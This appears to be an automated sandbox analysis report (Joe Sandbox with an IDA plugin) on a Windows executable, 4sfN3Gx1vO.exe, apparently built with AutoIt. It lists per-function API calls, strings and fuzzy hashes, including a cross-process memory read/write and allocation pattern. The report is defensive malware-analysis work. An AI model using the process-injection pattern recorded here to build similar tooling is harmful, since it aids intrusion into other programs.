                                                • Instruction ID: 200df3aa9b78b2f16348f5e6e0a2d62ff1a6f020dfa8d45f27de7e33c17c2d95
                                                • Opcode Fuzzy Hash: 1de2066f372abafc33b299c12c1ac75a756c330819fcff9d7bc5cd86e80e004b
                                                • Instruction Fuzzy Hash: 11F04F31105A48EBDB1A5F65ED5C7683FA1BF22322F048214F4A5991F2CB348999FF28
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: __freea$_free
                                                • String ID: a/p$am/pm
                                                • API String ID: 3432400110-3206640213
                                                • Opcode ID: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
                                                • Instruction ID: b3fb87df8b0c21aec00abaf69fc268ed9dd220c54b0c1d378f7e8fd52fd1d0f7
                                                • Opcode Fuzzy Hash: 80df0facff56a307b35277d354b267233c5c8cfe930299b035d27d01bf7ca494
                                                • Instruction Fuzzy Hash: 40D14835900A06DBCB288F68C859BFEBFB1FF05708F244919E9169B650D3759DC0CB99
                                                APIs
                                                  • Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
                                                  • Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A
                                                  • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                • __Init_thread_footer.LIBCMT ref: 00596238
                                                  • Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
                                                  • Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235
                                                  • Part of subcall function 0058359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4
                                                  • Part of subcall function 0058359C: LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                • String ID: x#^$x#^$x#^
                                                • API String ID: 1072379062-3539263148
                                                • Opcode ID: de84732fc6906404ec6238190564033d2acdd144cf554ff4658f3047d54c4588
                                                • Instruction ID: b7042cb355b1f99f464c70204d58ead184cd3a5e64363a337f8234473ba18ccd
                                                • Opcode Fuzzy Hash: de84732fc6906404ec6238190564033d2acdd144cf554ff4658f3047d54c4588
                                                • Instruction Fuzzy Hash: 11C17B71A00106AFDF14DF98C895EAEBBB9FF48300F118469F945AB291DB70ED49CB90
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00548B6E
                                                • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00548B7A
                                                • __dosmaperr.LIBCMT ref: 00548B81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                • String ID: .S
                                                • API String ID: 2434981716-1539595904
                                                • Opcode ID: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
                                                • Instruction ID: 61160430dc0af42a2c6ce47f131ebf2d9356acf99187ec2df56aaa95f0567b98
                                                • Opcode Fuzzy Hash: b00082088acc37bbf87162f7e33cde85b6b5a706494779aad554395f90418ada
                                                • Instruction Fuzzy Hash: 40419D70604045AFCB249F25CC84AFD7FE5FB8631CF2885AAF8958B242DE71CC429790
                                                APIs
                                                  • Part of subcall function 0057B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721D0,?,?,00000034,00000800,?,00000034), ref: 0057B42D
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00572760
                                                  • Part of subcall function 0057B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,005721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0057B3F8
                                                  • Part of subcall function 0057B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0057B355
                                                  • Part of subcall function 0057B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B365
                                                  • Part of subcall function 0057B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00572194,00000034,?,?,00001004,00000000,00000000), ref: 0057B37B
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 005727CD
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0057281A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
                                                • Instruction ID: b7b3cf812bcab17bab430310755f0f5b6b993fc0ed95593300527fad4b2626ab
                                                • Opcode Fuzzy Hash: 064dbbebfd5c402402e3f11513dd621facdad38784f15445ffb929dc226f0c2f
                                                • Instruction Fuzzy Hash: 9A416D72900219AFDB10DBA4DD45BDEBBB8FF45300F108099FA59B7181DB706E85DBA1
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4sfN3Gx1vO.exe,00000104), ref: 00541769
                                                • _free.LIBCMT ref: 00541834
                                                • _free.LIBCMT ref: 0054183E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Users\user\Desktop\4sfN3Gx1vO.exe
                                                • API String ID: 2506810119-3505091812
                                                • Opcode ID: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
                                                • Instruction ID: eeee8538d5b81146783530cfec5b4309f3ba51fceb5c8e64b119fbbb5fd5db2b
                                                • Opcode Fuzzy Hash: 85266c84dfedaa20b5a7290546344e0bfc9e02bd7658e47d04f4e2feb068dd38
                                                • Instruction Fuzzy Hash: 5331BC75A00A58ABDB25DB9A9C84DDEBFFCFB95314F104166F8049B211D6708A80DB98
                                                APIs
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0057C306
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 0057C34C
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005E1990,01585818), ref: 0057C395
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem
                                                • String ID: 0
                                                • API String ID: 135850232-4108050209
                                                • Opcode ID: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
                                                • Instruction ID: 82bc2f369544b9245633c3bd4eff52f0b4197526ff05008ff2d93bf76aac84ee
                                                • Opcode Fuzzy Hash: 03565f18d6f4bf437eb29874ece6787541dfd90247eec257be14d44aeb22ef59
                                                • Instruction Fuzzy Hash: A1418E712043029FD720DF25E884B5ABFE4BF85320F14CA1DF9A9972D1D730A904EB62
                                                APIs
                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,005ACC08,00000000,?,?,?,?), ref: 005A44AA
                                                • GetWindowLongW.USER32 ref: 005A44C7
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005A44D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Long
                                                • String ID: SysTreeView32
                                                • API String ID: 847901565-1698111956
                                                • Opcode ID: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
                                                • Instruction ID: 4873749e4507687ffc0272da20159f5b84f6073fe35ad84ddef6095fe723cada
                                                • Opcode Fuzzy Hash: 7d29528cef674264b84be62b0e111c28e55fdb622321f230796781f3db644e79
                                                • Instruction Fuzzy Hash: B9315C31210606AFDF219EB8DC45BEA7FA9FB8A334F204725F975921D0D7B0AC519B50
                                                APIs
                                                • SysReAllocString.OLEAUT32(?,?), ref: 00576EED
                                                • VariantCopyInd.OLEAUT32(?,?), ref: 00576F08
                                                • VariantClear.OLEAUT32(?), ref: 00576F12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyString
                                                • String ID: *jW
                                                • API String ID: 2173805711-2693160286
                                                • Opcode ID: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
                                                • Instruction ID: 44ee51ad280366b0a565b4ed83e78f19bbb2caa039ebc39a47f9f52f1951dfdd
                                                • Opcode Fuzzy Hash: e222dacec7af85bcd0789438c73db7ac1fa2fcd13b4296e363e227b78d300cf1
                                                • Instruction Fuzzy Hash: BB31B371604606DFDB04AF64F8949BD3F76FF85300B104898F9064B2A1D7309D91EBA4
                                                APIs
                                                  • Part of subcall function 0059335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00593077,?,?), ref: 00593378
                                                • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0059307A
                                                • _wcslen.LIBCMT ref: 0059309B
                                                • htons.WSOCK32(00000000,?,?,00000000), ref: 00593106
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                • String ID: 255.255.255.255
                                                • API String ID: 946324512-2422070025
                                                • Opcode ID: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
                                                • Instruction ID: b7988a32a94d354688cc7802369c09e2f709e1e9885909f3bd948fcabf683d35
                                                • Opcode Fuzzy Hash: 78dd40aee28c6856205b5010857949670ddff2b7c8a1631a27753eb08665188b
                                                • Instruction Fuzzy Hash: 2A31B039600202DFCB20CF68C589AAA7FE0FF55318F248459E9158B3A2DB32EE45D760
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 005A4705
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 005A4713
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005A471A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
                                                • Instruction ID: c91d114d8811ffbe7e007e7097770fd6d48f963bac30f61831a6da48671c38db
                                                • Opcode Fuzzy Hash: b97b30fca7c9fa717f541dffe9d8cca0d32186fd61603e6af52a40dd884655f9
                                                • Instruction Fuzzy Hash: E72151B5600249AFDB10DF68DCC5DBB3BADFB9B394B040459FA019B261DB70EC51DA60
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 176396367-2734436370
                                                • Opcode ID: c7d286b08879fb0b6d8ae524f38049a7491f73f969b39a7e70e99d8c81f0c7ca
                                                • Instruction ID: cd10c6d01f152332f5155d5cf581eff24f34541b12618ff2b35ce0a908ff0897
                                                • Opcode Fuzzy Hash: c7d286b08879fb0b6d8ae524f38049a7491f73f969b39a7e70e99d8c81f0c7ca
                                                • Instruction Fuzzy Hash: 9921087210462266D331AA29AC06FBB7FACBFD5310F148426F94D97181EB51AD81E3F5
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 005A3840
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 005A3850
                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 005A3876
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
                                                • Instruction ID: 16ab0d73d7ec5fdddcefd8e1ad1e02aa67a76108507ea7a7b151b4ba6b84a5f6
                                                • Opcode Fuzzy Hash: ac3c9b42013912ca22de0ad213a1a1cf7f631d677117bae5d8fa9a5fb8b1e451
                                                • Instruction Fuzzy Hash: 3521BE72600219BBEB218F64CC85EBF3B6EFF8A754F108125F9009B190CA75DD528BA0
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 00584A08
                                                • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00584A5C
                                                • SetErrorMode.KERNEL32(00000000,?,?,005ACC08), ref: 00584AD0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorMode$InformationVolume
                                                • String ID: %lu
                                                • API String ID: 2507767853-685833217
                                                • Opcode ID: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
                                                • Instruction ID: 0037eeb0ff125ed1899e4654c4d0db9e6e06dd6a80b791260e61ed13296bf692
                                                • Opcode Fuzzy Hash: 68cff9678ffcb0c9caef91b0f2b0e22263f4b529ac0c212f710bf53590214787
                                                • Instruction Fuzzy Hash: C7314B75A00209AFDB10DF54C885EAA7FF9FF49308F1480A5E909EB252DB71EE45CB61
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005A424F
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 005A4264
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005A4271
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
                                                • Instruction ID: 641ec9e6f322ed538e558a8222291f584a4bb7f2c0851ce90431f072bffea93b
                                                • Opcode Fuzzy Hash: 8d912a7132a55813900e5a631ffeac11ee593ad80096fec63b8d9d7627b5ce59
                                                • Instruction Fuzzy Hash: 8011A331240248BEEF205E69CC46FAB3FACFFD6B54F110525FA55E6090D6B1DC519B50
                                                APIs
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                  • Part of subcall function 00572DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
                                                  • Part of subcall function 00572DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
                                                  • Part of subcall function 00572DA7: GetCurrentThreadId.KERNEL32 ref: 00572DDD
                                                  • Part of subcall function 00572DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4
                                                • GetFocus.USER32 ref: 00572F78
                                                  • Part of subcall function 00572DEE: GetParent.USER32(00000000), ref: 00572DF9
                                                • GetClassNameW.USER32(?,?,00000100), ref: 00572FC3
                                                • EnumChildWindows.USER32(?,0057303B), ref: 00572FEB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                • String ID: %s%d
                                                • API String ID: 1272988791-1110647743
                                                • Opcode ID: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
                                                • Instruction ID: 0284a40ecf1a234bd9a447240347ce344aa19da3ef18e3bce9d07fb704a45c16
                                                • Opcode Fuzzy Hash: 7e13d4eee0aeb51ca3cd6c13c07e89be3ce19a6521083f4445ffc6e30d7a030b
                                                • Instruction Fuzzy Hash: 9D11A2716002066BDF14BF74AC89EED3F6ABFD5314F048075B90D9B292DE30994AAB60
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58C1
                                                • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 005A58EE
                                                • DrawMenuBar.USER32(?), ref: 005A58FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Menu$InfoItem$Draw
                                                • String ID: 0
                                                • API String ID: 3227129158-4108050209
                                                • Opcode ID: 619f8348d8e64c93262a53a7eea57482402fb24acad13cdf8d54641735dec090
                                                • Instruction ID: c7d871573c25bb420818d4a14f52760362fc881f762fb8be5d11e86f48b69884
                                                • Opcode Fuzzy Hash: 619f8348d8e64c93262a53a7eea57482402fb24acad13cdf8d54641735dec090
                                                • Instruction Fuzzy Hash: FD010C31500219EEDB619F11E844FAFBFB8BF46361F1484A9F849DA151EB308A94EF21
                                                APIs
                                                • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0056D3BF
                                                • FreeLibrary.KERNEL32 ref: 0056D3E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
